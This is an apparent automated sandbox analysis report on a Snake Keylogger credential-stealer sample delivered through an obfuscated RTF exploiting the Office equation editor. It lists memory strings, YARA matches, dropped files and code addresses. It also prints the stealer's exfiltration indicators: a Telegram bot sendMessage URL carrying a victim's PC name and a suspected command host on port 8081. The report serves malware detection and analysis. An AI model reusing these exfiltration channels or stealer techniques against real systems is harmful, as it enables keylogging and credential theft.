                  Source: cdlpohalgate39567.exe, 00000007.00000002.942629985.000000000268D000.00000004.00000800.00020000.00000000.sdmp, cdlpohalgate39567.exe, 00000007.00000002.942629985.000000000259F000.00000004.00000800.00020000.00000000.sdmp, cdlpohalgate39567.exe, 00000007.00000002.942629985.000000000262A000.00000004.00000800.00020000.00000000.sdmp, cdlpohalgate39567.exe, 00000007.00000002.942629985.0000000002636000.00000004.00000800.00020000.00000000.sdmp, cdlpohalgate39567.exe, 00000007.00000002.942629985.0000000002644000.00000004.00000800.00020000.00000000.sdmp, cdlpohalgate39567.exe, 00000007.00000002.942629985.000000000267F000.00000004.00000800.00020000.00000000.sdmp, cdlpohalgate39567.exe, 00000007.00000002.942629985.000000000266D000.00000004.00000800.00020000.00000000.sdmp, cdlpohalgate39567.exe, 00000007.00000002.942629985.0000000002619000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.org
                  Source: cdlpohalgate39567.exe, 00000005.00000002.438271817.0000000002749000.00000004.00000800.00020000.00000000.sdmp, cdlpohalgate39567.exe, 00000007.00000002.942629985.00000000024E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: cdlpohalgate39567.exe, 00000005.00000000.428364525.0000000001012000.00000020.00000001.01000000.00000004.sdmp, cdlpohalgate39567.exe.2.dr, pgTQ4mfZBbJhpdd[1].exe.2.drString found in binary or memory: http://tempuri.org/DataSet1.xsd
                  Source: cdlpohalgate39567.exe, 00000005.00000002.438924652.0000000003D39000.00000004.00000800.00020000.00000000.sdmp, cdlpohalgate39567.exe, 00000007.00000002.942629985.00000000024E1000.00000004.00000800.00020000.00000000.sdmp, cdlpohalgate39567.exe, 00000007.00000002.942222984.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
                  Source: cdlpohalgate39567.exe, 00000007.00000002.942265984.0000000000526000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
                  Source: cdlpohalgate39567.exe, 00000007.00000002.942265984.0000000000526000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
                  Source: cdlpohalgate39567.exe, 00000007.00000002.942629985.0000000002768000.00000004.00000800.00020000.00000000.sdmp, cdlpohalgate39567.exe, 00000007.00000002.943337950.000000000355B000.00000004.00000800.00020000.00000000.sdmp, cdlpohalgate39567.exe, 00000007.00000002.942629985.00000000027BC000.00000004.00000800.00020000.00000000.sdmp, cdlpohalgate39567.exe, 00000007.00000002.942629985.000000000277B000.00000004.00000800.00020000.00000000.sdmp, cdlpohalgate39567.exe, 00000007.00000002.942629985.00000000027A9000.00000004.00000800.00020000.00000000.sdmp, cdlpohalgate39567.exe, 00000007.00000002.943337950.00000000035A7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                  Source: cdlpohalgate39567.exe, 00000007.00000002.942629985.000000000269B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                  Source: cdlpohalgate39567.exe, 00000005.00000002.438924652.0000000003D39000.00000004.00000800.00020000.00000000.sdmp, cdlpohalgate39567.exe, 00000007.00000002.942629985.000000000269B000.00000004.00000800.00020000.00000000.sdmp, cdlpohalgate39567.exe, 00000007.00000002.942222984.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                  Source: cdlpohalgate39567.exe, 00000007.00000002.942629985.000000000269B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
                  Source: cdlpohalgate39567.exe, 00000007.00000002.942629985.000000000269B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:610930%0D%0ADate%20a
                  Source: cdlpohalgate39567.exe, 00000007.00000002.942629985.0000000002768000.00000004.00000800.00020000.00000000.sdmp, cdlpohalgate39567.exe, 00000007.00000002.943337950.000000000355B000.00000004.00000800.00020000.00000000.sdmp, cdlpohalgate39567.exe, 00000007.00000002.942629985.00000000027BC000.00000004.00000800.00020000.00000000.sdmp, cdlpohalgate39567.exe, 00000007.00000002.942629985.000000000277B000.00000004.00000800.00020000.00000000.sdmp, cdlpohalgate39567.exe, 00000007.00000002.942629985.00000000027A9000.00000004.00000800.00020000.00000000.sdmp, cdlpohalgate39567.exe, 00000007.00000002.943337950.00000000035A7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                  Source: cdlpohalgate39567.exe, 00000007.00000002.942629985.0000000002768000.00000004.00000800.00020000.00000000.sdmp, cdlpohalgate39567.exe, 00000007.00000002.943337950.000000000355B000.00000004.00000800.00020000.00000000.sdmp, cdlpohalgate39567.exe, 00000007.00000002.942629985.00000000027BC000.00000004.00000800.00020000.00000000.sdmp, cdlpohalgate39567.exe, 00000007.00000002.942629985.000000000277B000.00000004.00000800.00020000.00000000.sdmp, cdlpohalgate39567.exe, 00000007.00000002.942629985.00000000027A9000.00000004.00000800.00020000.00000000.sdmp, cdlpohalgate39567.exe, 00000007.00000002.943337950.00000000035A7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                  Source: cdlpohalgate39567.exe, 00000007.00000002.942629985.0000000002768000.00000004.00000800.00020000.00000000.sdmp, cdlpohalgate39567.exe, 00000007.00000002.943337950.000000000355B000.00000004.00000800.00020000.00000000.sdmp, cdlpohalgate39567.exe, 00000007.00000002.942629985.00000000027BC000.00000004.00000800.00020000.00000000.sdmp, cdlpohalgate39567.exe, 00000007.00000002.942629985.000000000277B000.00000004.00000800.00020000.00000000.sdmp, cdlpohalgate39567.exe, 00000007.00000002.942629985.00000000027A9000.00000004.00000800.00020000.00000000.sdmp, cdlpohalgate39567.exe, 00000007.00000002.943337950.00000000035A7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                  Source: cdlpohalgate39567.exe, 00000007.00000002.942629985.0000000002768000.00000004.00000800.00020000.00000000.sdmp, cdlpohalgate39567.exe, 00000007.00000002.943337950.000000000355B000.00000004.00000800.00020000.00000000.sdmp, cdlpohalgate39567.exe, 00000007.00000002.942629985.00000000027BC000.00000004.00000800.00020000.00000000.sdmp, cdlpohalgate39567.exe, 00000007.00000002.942629985.000000000277B000.00000004.00000800.00020000.00000000.sdmp, cdlpohalgate39567.exe, 00000007.00000002.942629985.00000000027A9000.00000004.00000800.00020000.00000000.sdmp, cdlpohalgate39567.exe, 00000007.00000002.943337950.00000000035A7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                  Source: cdlpohalgate39567.exe, 00000007.00000002.942629985.000000000268D000.00000004.00000800.00020000.00000000.sdmp, cdlpohalgate39567.exe, 00000007.00000002.942629985.00000000025C9000.00000004.00000800.00020000.00000000.sdmp, cdlpohalgate39567.exe, 00000007.00000002.942629985.0000000002586000.00000004.00000800.00020000.00000000.sdmp, cdlpohalgate39567.exe, 00000007.00000002.942629985.000000000262A000.00000004.00000800.00020000.00000000.sdmp, cdlpohalgate39567.exe, 00000007.00000002.942629985.0000000002636000.00000004.00000800.00020000.00000000.sdmp, cdlpohalgate39567.exe, 00000007.00000002.942629985.0000000002644000.00000004.00000800.00020000.00000000.sdmp, cdlpohalgate39567.exe, 00000007.00000002.942629985.000000000267F000.00000004.00000800.00020000.00000000.sdmp, cdlpohalgate39567.exe, 00000007.00000002.942629985.000000000266D000.00000004.00000800.00020000.00000000.sdmp, cdlpohalgate39567.exe, 00000007.00000002.942629985.0000000002619000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                  Source: cdlpohalgate39567.exe, 00000005.00000002.438924652.0000000003D39000.00000004.00000800.00020000.00000000.sdmp, cdlpohalgate39567.exe, 00000007.00000002.942629985.0000000002586000.00000004.00000800.00020000.00000000.sdmp, cdlpohalgate39567.exe, 00000007.00000002.942222984.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                  Source: cdlpohalgate39567.exe, 00000007.00000002.942629985.0000000002619000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/173.254.250.78
                  Source: cdlpohalgate39567.exe, 00000007.00000002.942629985.000000000268D000.00000004.00000800.00020000.00000000.sdmp, cdlpohalgate39567.exe, 00000007.00000002.942629985.00000000025C9000.00000004.00000800.00020000.00000000.sdmp, cdlpohalgate39567.exe, 00000007.00000002.942629985.000000000262A000.00000004.00000800.00020000.00000000.sdmp, cdlpohalgate39567.exe, 00000007.00000002.942629985.0000000002636000.00000004.00000800.00020000.00000000.sdmp, cdlpohalgate39567.exe, 00000007.00000002.942629985.0000000002644000.00000004.00000800.00020000.00000000.sdmp, cdlpohalgate39567.exe, 00000007.00000002.942629985.000000000267F000.00000004.00000800.00020000.00000000.sdmp, cdlpohalgate39567.exe, 00000007.00000002.942629985.000000000266D000.00000004.00000800.00020000.00000000.sdmp, cdlpohalgate39567.exe, 00000007.00000002.942629985.0000000002619000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/173.254.250.784
                  Source: cdlpohalgate39567.exe, 00000007.00000002.942629985.0000000002768000.00000004.00000800.00020000.00000000.sdmp, cdlpohalgate39567.exe, 00000007.00000002.943337950.000000000355B000.00000004.00000800.00020000.00000000.sdmp, cdlpohalgate39567.exe, 00000007.00000002.942629985.00000000027BC000.00000004.00000800.00020000.00000000.sdmp, cdlpohalgate39567.exe, 00000007.00000002.942629985.000000000277B000.00000004.00000800.00020000.00000000.sdmp, cdlpohalgate39567.exe, 00000007.00000002.942629985.00000000027A9000.00000004.00000800.00020000.00000000.sdmp, cdlpohalgate39567.exe, 00000007.00000002.943337950.00000000035A7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
                  Source: cdlpohalgate39567.exe, 00000007.00000002.942629985.0000000002768000.00000004.00000800.00020000.00000000.sdmp, cdlpohalgate39567.exe, 00000007.00000002.943337950.000000000355B000.00000004.00000800.00020000.00000000.sdmp, cdlpohalgate39567.exe, 00000007.00000002.942629985.00000000027BC000.00000004.00000800.00020000.00000000.sdmp, cdlpohalgate39567.exe, 00000007.00000002.942629985.000000000277B000.00000004.00000800.00020000.00000000.sdmp, cdlpohalgate39567.exe, 00000007.00000002.942629985.00000000027A9000.00000004.00000800.00020000.00000000.sdmp, cdlpohalgate39567.exe, 00000007.00000002.943337950.00000000035A7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                  Source: cdlpohalgate39567.exe, 00000007.00000002.942265984.0000000000526000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
                  Source: cdlpohalgate39567.exe, 00000007.00000002.942629985.00000000027A9000.00000004.00000800.00020000.00000000.sdmp, cdlpohalgate39567.exe, 00000007.00000002.943337950.00000000035A7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/favicon.ico
                  Source: cdlpohalgate39567.exe, 00000007.00000002.943337950.0000000003657000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search?q=net
                  Source: cdlpohalgate39567.exe, 00000007.00000002.943337950.0000000003657000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search?q=test&oq=test&aqs=chrome..69i57j46j0l3j46j0.427j0j7&sourceid=chrome&i
                  Source: cdlpohalgate39567.exe, 00000007.00000002.943337950.0000000003657000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search?q=wmf
                  Source: cdlpohalgate39567.exe, 00000007.00000002.942629985.00000000027BC000.00000004.00000800.00020000.00000000.sdmp, cdlpohalgate39567.exe, 00000007.00000002.943337950.00000000036E6000.00000004.00000800.00020000.00000000.sdmp, cdlpohalgate39567.exe, 00000007.00000002.943337950.000000000370B000.00000004.00000800.00020000.00000000.sdmp, cdlpohalgate39567.exe, 00000007.00000002.943337950.0000000003657000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/sorry/index
                  Source: cdlpohalgate39567.exe, 00000007.00000002.943337950.00000000036F6000.00000004.00000800.00020000.00000000.sdmp, cdlpohalgate39567.exe, 00000007.00000002.943337950.0000000003657000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/sorry/index?continue=https://www.google.com/search%3Fq%3Dtest%26oq%3Dtest%26a
                  Source: cdlpohalgate39567.exe, 00000007.00000002.943337950.00000000036F6000.00000004.00000800.00020000.00000000.sdmp, cdlpohalgate39567.exe, 00000007.00000002.943337950.0000000003657000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/sorry/index?continue=https://www.google.com/search%3Fq%3Dwmf%2B5.1%26oq%3Dwmf
                  Source: cdlpohalgate39567.exe, 00000007.00000002.943337950.00000000036BE000.00000004.00000800.00020000.00000000.sdmp, cdlpohalgate39567.exe, 00000007.00000002.943337950.0000000003642000.00000004.00000800.00020000.00000000.sdmp, cdlpohalgate39567.exe, 00000007.00000002.943337950.000000000369C000.00000004.00000800.00020000.00000000.sdmp, cdlpohalgate39567.exe, 00000007.00000002.943337950.00000000035E8000.00000004.00000800.00020000.00000000.sdmp, cdlpohalgate39567.exe, 00000007.00000002.943337950.000000000360A000.00000004.00000800.00020000.00000000.sdmp, cdlpohalgate39567.exe, 00000007.00000002.943337950.00000000036F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/sorry/indextest
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49169
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49179
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49167
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49166
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49177
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49181 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49182 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49175
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49173
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49171
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49182
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49181
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49175 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49169 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49167 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49171 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49166 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49173 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49177 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49179 -> 443
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.22:49182 version: TLS 1.2

                  Key, Mouse, Clipboard, Microphone and Screen Capturing

                  barindex
                  Contains functionality to capture screen (.Net source)
                  Source: 5.2.cdlpohalgate39567.exe.4069d28.3.raw.unpack, COVID19.cs.Net Code: TakeScreenshot
                  Contains functionality to log keystrokes (.Net Source)
                  Source: 5.2.cdlpohalgate39567.exe.4069d28.3.raw.unpack, COVID19.cs.Net Code: VKCodeToUnicode

                  System Summary

                  barindex
                  Initial sample is an obfuscated RTF file
                  Source: initial sampleStatic file information: Filename: na.doc
                  Malicious sample detected (through community Yara rule)
                  Source: na.doc, type: SAMPLEMatched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
                  Source: 7.2.cdlpohalgate39567.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 7.2.cdlpohalgate39567.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 7.2.cdlpohalgate39567.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 5.2.cdlpohalgate39567.exe.4069d28.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 5.2.cdlpohalgate39567.exe.4069d28.3.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 5.2.cdlpohalgate39567.exe.4069d28.3.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 5.2.cdlpohalgate39567.exe.3fe5508.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 5.2.cdlpohalgate39567.exe.3fe5508.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 5.2.cdlpohalgate39567.exe.3f60ce8.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 5.2.cdlpohalgate39567.exe.3f60ce8.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 5.2.cdlpohalgate39567.exe.4069d28.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 5.2.cdlpohalgate39567.exe.4069d28.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 5.2.cdlpohalgate39567.exe.4069d28.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 00000007.00000002.942222984.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 00000005.00000002.438924652.0000000003D39000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: Process Memory Space: cdlpohalgate39567.exe PID: 3788, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: Process Memory Space: cdlpohalgate39567.exe PID: 3872, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Office equation editor drops PE file
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\pgTQ4mfZBbJhpdd[1].exeJump to dropped file
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeJump to dropped file
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeProcess Stats: CPU usage > 49%
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 770B0000 page execute and read and writeJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 770B0000 page execute and read and writeJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 5_2_0035A980 NtQueryInformationProcess,5_2_0035A980
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 5_2_0035AEE8 NtQueryInformationProcess,5_2_0035AEE8
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0068BE502_2_0068BE50
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 5_2_0035C4685_2_0035C468
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 5_2_003505645_2_00350564
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 5_2_00356BA95_2_00356BA9
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 5_2_00357E7A5_2_00357E7A
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 5_2_0035A3C05_2_0035A3C0
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 5_2_0035C4585_2_0035C458
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 5_2_003516485_2_00351648
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 5_2_0035C6D85_2_0035C6D8
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 5_2_0035C6C75_2_0035C6C7
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 5_2_00359AC85_2_00359AC8
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 5_2_00359F005_2_00359F00
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 5_2_00BC34B85_2_00BC34B8
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 5_2_00BC30905_2_00BC3090
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 5_2_00BC44885_2_00BC4488
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 5_2_00BC34C85_2_00BC34C8
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 5_2_00BC39B05_2_00BC39B0
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_002540F87_2_002540F8
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_002581007_2_00258100
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_0025390C7_2_0025390C
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_002549687_2_00254968
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_002531B17_2_002531B1
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_002569B87_2_002569B8
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_00259A4A7_2_00259A4A
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_002543C87_2_002543C8
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_002534827_2_00253482
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_002574907_2_00257490
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_00255D007_2_00255D00
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_0025DD507_2_0025DD50
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_00253E287_2_00253E28
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_002546997_2_00254699
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_00258EC27_2_00258EC2
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_002587E67_2_002587E6
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_0025E8A87_2_0025E8A8
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_0025F1D97_2_0025F1D9
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_0025FB087_2_0025FB08
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_0025DD417_2_0025DD41
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_0025ED407_2_0025ED40
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_0025D5B87_2_0025D5B8
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_0025D5C87_2_0025D5C8
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_0025F6707_2_0025F670
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_00631C607_2_00631C60
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_00634E607_2_00634E60
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_006380607_2_00638060
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_006300407_2_00630040
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_006332407_2_00633240
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_006364407_2_00636440
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_006316207_2_00631620
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_006348207_2_00634820
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_00637A207_2_00637A20
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_00632C007_2_00632C00
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_00635E007_2_00635E00
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_006390007_2_00639000
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_006328E07_2_006328E0
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_00635AE07_2_00635AE0
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_00638CE07_2_00638CE0
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_00630CC07_2_00630CC0
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_00633EC07_2_00633EC0
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_006370C07_2_006370C0
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_006322A07_2_006322A0
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_006354A07_2_006354A0
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_006386A07_2_006386A0
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_006306807_2_00630680
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_006338807_2_00633880
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_00636A807_2_00636A80
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_006303607_2_00630360
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_006335607_2_00633560
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_006367607_2_00636760
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_006319407_2_00631940
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_00634B407_2_00634B40
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_00637D407_2_00637D40
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_00632F207_2_00632F20
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_006361207_2_00636120
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_006313007_2_00631300
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_006345007_2_00634500
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_006377007_2_00637700
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_00630FE07_2_00630FE0
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_006341E07_2_006341E0
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_006373E07_2_006373E0
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_00632BF67_2_00632BF6
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_006325C07_2_006325C0
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_006357C07_2_006357C0
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_006389C07_2_006389C0
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_006309A07_2_006309A0
